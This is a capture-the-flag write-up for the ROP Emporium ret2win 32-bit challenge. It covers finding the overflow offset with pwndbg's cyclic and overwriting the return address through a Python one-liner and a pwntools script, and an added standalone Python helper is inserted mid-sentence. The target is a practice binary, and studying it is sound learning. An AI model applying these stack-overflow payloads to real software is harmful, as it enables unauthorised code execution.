# Binary Exploitation (Pwn)

## ROP Emporium

> <https://ropemporium.com/>
>
> To download all challenges:
>
> <https://ropemporium.com/binary/rop_emporium_all_challenges.zip>

### Ret2win

Running the program and feeding it a long run of `a` characters crashes it with a segmentation fault, which suggests the saved return address is being overwritten:

```bash
┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ ./ret2win32 
ret2win by ROP Emporium
x86

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Thank you!
Segmentation fault
```

List the binary's functions with `info functions` in pwndbg:

```bash
pwndbg> info functions
All defined functions:

Non-debugging symbols:
0x08048374  _init
0x080483b0  read@plt
0x080483c0  printf@plt
0x080483d0  puts@plt
0x080483e0  system@plt
0x080483f0  __libc_start_main@plt
0x08048400  setvbuf@plt
0x08048410  memset@plt
0x08048420  __gmon_start__@plt
0x08048430  _start
0x08048470  _dl_relocate_static_pie
0x08048480  __x86.get_pc_thunk.bx
0x08048490  deregister_tm_clones
0x080484d0  register_tm_clones
0x08048510  __do_global_dtors_aux
0x08048540  frame_dummy
0x08048546  main
0x080485ad  pwnme
0x0804862c  ret2win
0x08048660  __libc_csu_init
0x080486c0  __libc_csu_fini
0x080486c4  _fini
```

Disassemble `ret2win`:

```bash
pwndbg> disassemble ret2win
Dump of assembler code for function ret2win:
   0x0804862c <+0>:     push   ebp
   0x0804862d <+1>:     mov    ebp,esp
   0x0804862f <+3>:     sub    esp,0x8
   0x08048632 <+6>:     sub    esp,0xc
   0x08048635 <+9>:     push   0x80487f6
   0x0804863a <+14>:    call   0x80483d0 <puts@plt>
   0x0804863f <+19>:    add    esp,0x10
   0x08048642 <+22>:    sub    esp,0xc
   0x08048645 <+25>:    push   0x8048813
   0x0804864a <+30>:    call   0x80483e0 <system@plt>
   0x0804864f <+35>:    add    esp,0x10
   0x08048652 <+38>:    nop
   0x08048653 <+39>:    leave
   0x08048654 <+40>:    ret
```

`ret2win` pushes the string at `0x8048813` and calls `system()`; that string is `/bin/cat flag.txt`. Returning into `ret2win` is therefore enough to print the flag, with no arguments to set up.

Generate a pattern with `cyclic`, run the program under pwndbg and paste the pattern as input:

```
pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
pwndbg>
```

![](/files/mTlJ2IJ5aQTzquUXSgNr)

To find the offset, take the 4 bytes of the pattern that ended up in `EIP` at the crash (`laaa`) and look them up with `cyclic -l laaa`.

The offset is `44`, so the payload is 44 bytes of padding followed by the address of `ret2win`, the function that runs `cat flag.txt`.

Check the address of `ret2win` function

```
pwndbg> p ret2win
$1 = {<text variable, no debug info>} 0x804862c <ret2win>
pwndbg>
```

x86 is little-endian, so the address `0x0804862c` is written byte-reversed as `\x2c\x86\x04\x08`:
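The two manual steps above (find the offset with `cyclic` / `cyclic -l`, then pack the address little-endian) can be reproduced without pwndbg or pwntools. The following is an added example, not code from the ROP Emporium writeup or from the pwntools project: it reimplements the de Bruijn pattern that pwndbg's `cyclic` generates (the a-z alphabet and 4-byte windows are assumptions that match the output shown above) and builds the same payload with `struct.pack`. The `0x0804862c` address of `ret2win` and the 56-byte `read()` limit come from the page; `cyclic_find` additionally accepts the crashed `EIP` value as an integer (`0x6161616c` is `laaa` read little-endian), which assumes you copy that value straight out of the debugger.

```python
#!/usr/bin/env python3
"""Added example (not from the ROP Emporium writeup or pwntools): reproduce
pwndbg's `cyclic` / `cyclic -l` and pack the ret2win address little-endian
with only the standard library.

Assumptions: pwndbg's default alphabet (a-z) and 4-byte subsequences, the
ret2win address 0x0804862c and the 56-byte read() limit quoted by the binary."""
import itertools
import struct

ALPHABET = "abcdefghijklmnopqrstuvwxyz"  # pwndbg/pwntools default
SUBSEQ = 4                               # 32-bit: every 4-byte window is unique


def de_bruijn(alphabet: str, n: int):
    """Yield the de Bruijn sequence B(k, n) character by character
    (Lyndon-word algorithm, the same ordering pwntools uses)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int) -> bytes:
    """Same output as `pwndbg> cyclic <length>`."""
    return "".join(itertools.islice(de_bruijn(ALPHABET, SUBSEQ), length)).encode()


def cyclic_find(needle, max_len: int = 20000) -> int:
    """Same as `pwndbg> cyclic -l <needle>`: offset of a 4-byte window.

    Accepts the bytes seen on the stack (b'laaa') or the crashing EIP value
    (0x6161616c), which is the same window read back as a little-endian int.
    Returns -1 if the window is not part of the first max_len bytes."""
    if isinstance(needle, int):
        needle = struct.pack("<I", needle)
    if isinstance(needle, str):
        needle = needle.encode()
    return cyclic(max_len).find(needle)


def p32(addr: int) -> bytes:
    """Pack a 32-bit address little-endian (what pwntools' p32 does)."""
    return struct.pack("<I", addr)


def build_payload(offset: int, ret_addr: int, limit: int = 56) -> bytes:
    """Padding up to the saved return address, then the address that replaces it."""
    payload = b"A" * offset + p32(ret_addr)
    if len(payload) > limit:  # pwnme's read() only consumes `limit` bytes
        raise ValueError(f"payload is {len(payload)} bytes, read() limit is {limit}")
    return payload


if __name__ == "__main__":
    print(cyclic(100).decode())
    print("offset:", cyclic_find(b"laaa"), cyclic_find(0x6161616C))
    print("p32(ret2win):", p32(0x0804862C))
    print("payload:", build_payload(44, 0x0804862C))
```

Running the file prints the same 100-byte pattern as `pwndbg> cyclic 100`, offset 44 for `laaa`, and the 48-byte payload. The length check in `build_payload` is the caveat that matters on later ROP Emporium levels: a longer chain that exceeds what `pwnme`'s `read()` accepts is silently truncated rather than delivered.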

```bash
┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ python -c 'print "A"*44 + "\x2c\x86\x04\x08"' | ./ret2win32 
ret2win by ROP Emporium
x86
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
Segmentation fault

```

Script with `pwntools`

```python
#!/usr/bin/python3
from pwn import *

# context.binary picks up arch/bits (i386) from the ELF so flat()/p32 pack correctly
elf = context.binary = ELF('./ret2win32', checksec=False)
p = process()  # defaults to context.binary

# 44 bytes reach the saved return address (found with cyclic -l laaa)
padding = 44
payload = flat(
    asm('nop') * padding,      # 0x90 filler; any bytes would do
    elf.symbols['ret2win'],    # overwrite the return address with ret2win()
)
# f = open("payload", "wb")
# f.write(payload)
p.sendlineafter(b'>', payload)
p.interactive()
```

```
─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ python3 auto_pwn.py 
[+] Starting local process '/home/sheinn101/ctf/rop_emporium/ret2win/ret2win32': pid 432041
[*] Switching to interactive mode
 Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
[*] Got EOF while reading in interactive
```

{% hint style="warning" %}
Coming Soon...
{% endhint %}

